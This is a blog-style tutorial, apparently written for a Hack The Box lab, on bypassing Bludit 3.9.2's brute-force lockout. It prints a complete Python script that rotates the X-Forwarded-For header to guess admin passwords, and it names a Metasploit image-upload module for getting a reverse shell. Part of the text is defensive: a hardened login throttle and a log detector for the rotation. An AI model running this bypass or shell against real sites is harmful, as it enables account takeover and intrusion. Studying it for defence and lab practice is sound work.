
Protection Bypass and Brute Force Attack – Bludit v. 3.9.2

So this post will describe how to bypass the brute-force protection in Bludit CMS v. 3.9.2, provided you already have a username. After the password has been found, I will discuss which Metasploit module can help you get a reverse shell. So, let's begin.

If we check the documentation that Bludit provides, we can see how they prevent brute-force attacks. Here is a screenshot and the link, if you want to read through the whole documentation.
https://docs.bludit.com/en/security/brute-force-protection

After some googling I found a script that I only had to edit slightly. I will post the script here along with the link to the original article.
https://rastating.github.io/bludit-brute-force-mitigation-bypass/

What you will need to change is how you give it the wordlist, and of course the IP address. The code below is a copy from rastating, so check his page as well and show him some love.

#!/usr/bin/env python3
import re
import requests

host = 'http://192.168.194.146/bludit'
login_url = host + '/admin/login'
username = 'admin'
wordlist = []

# Generate 50 incorrect passwords
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
    # Fresh session per attempt; the login form carries a CSRF token that has to be echoed back
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login answers with a redirect to the dashboard instead of re-rendering the form
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

After running this script with the desired username and a password list, if you are lucky you will get the password. That means you can log in with that user and look around.
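To see why the header trick in the script above works, and what the fix on the server side looks like, here is an added example from the defender's side. It is not code from this post or from Bludit: a hypothetical `LoginThrottle` that can key its lockout counter either on the client-supplied `X-Forwarded-For` header (the weak behaviour) or on the real socket peer address, honouring the header only when the peer is one of a configured `trusted_proxies` list, plus a small detector for the footprint such an attempt leaves in an access log (a constructed log format with the header appended as the last quoted field).

```python
import ipaddress
import re
from collections import defaultdict


class LoginThrottle:
    """Locks a client out after max_failures failed logins within window seconds.

    trust_header_from_anyone=True reproduces the weakness the script above relies
    on: the lockout key comes straight from the client-supplied X-Forwarded-For
    header, so every new header value gets a fresh counter. The default keys the
    counter on the socket peer address and only honours X-Forwarded-For when the
    peer is one of our own reverse proxies (hypothetical trusted_proxies list).
    """

    def __init__(self, max_failures=10, window=300, trusted_proxies=(),
                 trust_header_from_anyone=False):
        self.max_failures = max_failures
        self.window = window
        self.trusted_proxies = {ipaddress.ip_address(p) for p in trusted_proxies}
        self.trust_header_from_anyone = trust_header_from_anyone
        self.failures = defaultdict(list)  # lockout key -> failure timestamps

    def client_key(self, remote_addr, xff=None):
        """Pick the address the failure counter is attached to."""
        hops = [h.strip() for h in (xff or '').split(',') if h.strip()]
        if hops and self.trust_header_from_anyone:
            return hops[0]                     # weak: attacker-controlled value
        if hops and ipaddress.ip_address(remote_addr) in self.trusted_proxies:
            return hops[-1]                    # last hop was appended by our proxy
        return remote_addr                     # hardened: the real peer address

    def is_locked(self, key, now):
        recent = [t for t in self.failures[key] if now - t < self.window]
        self.failures[key] = recent            # drop failures outside the window
        return len(recent) >= self.max_failures

    def attempt(self, remote_addr, xff, password_ok, now):
        """Process one login attempt; returns 'locked', 'ok' or 'fail'."""
        key = self.client_key(remote_addr, xff)
        if self.is_locked(key, now):
            return 'locked'
        if password_ok:
            return 'ok'
        self.failures[key].append(now)
        return 'fail'


def simulate(throttle, attempts=50):
    """Constructed scenario: one socket peer sends `attempts` wrong passwords,
    each with a different X-Forwarded-For value (as the script above does).
    Returns how many attempts the throttle refused without checking a password."""
    refused = 0
    for i in range(attempts):
        result = throttle.attempt('203.0.113.7', 'Password{}'.format(i),
                                  password_ok=False, now=1000.0 + i)
        if result == 'locked':
            refused += 1
    return refused


# Detection side: a hypothetical access-log format that appends the
# X-Forwarded-For header as a final quoted field. Sample lines are constructed.
LOG_LINE = re.compile(r'^(?P<remote>\S+) \S+ \S+ \[[^\]]+\] '
                      r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
                      r'(?P<status>\d{3}) \S+ "(?P<xff>[^"]*)"$')

SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2019:10:00:0%d +0000] "POST /bludit/admin/login HTTP/1.1" 200 2317 "Password%d"' % (i, i)
    for i in range(7)
] + [
    '198.51.100.2 - - [10/Nov/2019:10:01:00 +0000] "GET /bludit/admin/login HTTP/1.1" 200 2317 "-"',
    '198.51.100.2 - - [10/Nov/2019:10:01:05 +0000] "POST /bludit/admin/login HTTP/1.1" 302 0 "-"',
]


def rotating_xff_clients(log_lines, threshold=5):
    """Return {peer address: distinct X-Forwarded-For values} for peers that POST
    to the login page with more than `threshold` distinct header values, which is
    the pattern the bypass leaves behind when the real peer address is logged."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m or m['method'] != 'POST' or not m['path'].endswith('/admin/login'):
            continue
        seen[m['remote']].add(m['xff'])
    return {ip: len(v) for ip, v in seen.items() if len(v) > threshold}


if __name__ == '__main__':
    print('weak throttle refused:', simulate(LoginThrottle(trust_header_from_anyone=True)))
    print('hardened throttle refused:', simulate(LoginThrottle()))
    print('suspicious peers:', rotating_xff_clients(SAMPLE_LOG))
```

Run as a script, the weak throttle refuses none of the 50 attempts while the hardened one refuses 40 of them (everything after the tenth failure from the same peer), and the detector flags the peer that rotated seven header values. The design point is that `X-Forwarded-For` is only meaningful on the hop your own proxy appended; logging the real peer address next to the header is what makes the rotation visible afterwards.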

So let's talk now about how to get a reverse shell once you have the username and password. There are two ways that I know of. The first one is to upload a PHP reverse shell hidden in an image; the one I used is a Metasploit module. A quick Google search will lead you to this Rapid7 link:
https://www.rapid7.com/db/modules/exploit/linux/http/bludit_upload_images_exec

So let's do the setup…

So now what's left to do is to set BLUDITPASS, BLUDITUSER, RHOST and RPORT to your desired values. When done, just “run” and you are in.

This method was tested on one of the active boxes on HTB. The write-up of that box can be found here, although I am going to keep it locked until the box is retired.
